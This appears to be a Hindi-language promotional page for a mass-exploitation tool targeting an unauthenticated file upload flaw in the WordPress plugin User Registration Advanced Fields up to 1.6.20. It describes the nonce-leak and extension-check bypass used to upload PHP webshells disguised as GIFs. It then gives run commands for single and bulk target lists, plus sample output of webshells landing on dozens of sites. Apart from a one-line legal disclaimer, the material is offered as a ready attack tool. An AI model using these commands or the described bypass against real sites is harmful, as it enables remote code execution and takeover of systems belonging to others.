
User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload
User Registration Advanced Fields <= 1.6.20 - अनधिकृत मनमानी फ़ाइल अपलोड
User Registration Advanced Fields <= 1.6.20 - अनधिकृत मनमानी फ़ाइल अपलोड
विवरण
WordPress के लिए User Registration Advanced Fields प्लगइन (संस्करण 1.6.20 तक) uraf_profile_picture_upload_method_upload AJAX क्रिया के माध्यम से अनधिकृत मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है। प्लगइन किसी भी पृष्ठ पर जिसमें पंजीकरण फ़ॉर्म है, wp_localize_script() के माध्यम से एक वैध nonce लीक करता है, और is_snapshot=1 पैरामीटर का उपयोग करके फ़ाइल एक्सटेंशन सत्यापन को पूरी तरह से बायपास करता है। यह अनधिकृत हमलावरों को मनमानी फ़ाइलें (जैसे, GIF छवियों के रूप में प्रच्छन्न PHP वेबशेल) अपलोड करने की अनुमति देता है, जो wp-content/uploads/user_registration_uploads/temp-uploads/ में संग्रहीत होती हैं, जिससे पूर्ण दूरस्थ कोड निष्पादन (RCE) होता है।
~ CVSS स्कोर: 9.8 (गंभीर)
~ प्रभावित संस्करण: <= 1.6.20
एकल लक्ष्य :
python3 shadow.py -u https://target.com -s shadow.phpसामूहिक लक्ष्य :
python3 shadow.py -f targets.txt -s shadow.php -t 30इंटरैक्टिव मोड :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
उन प्रणालियों का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।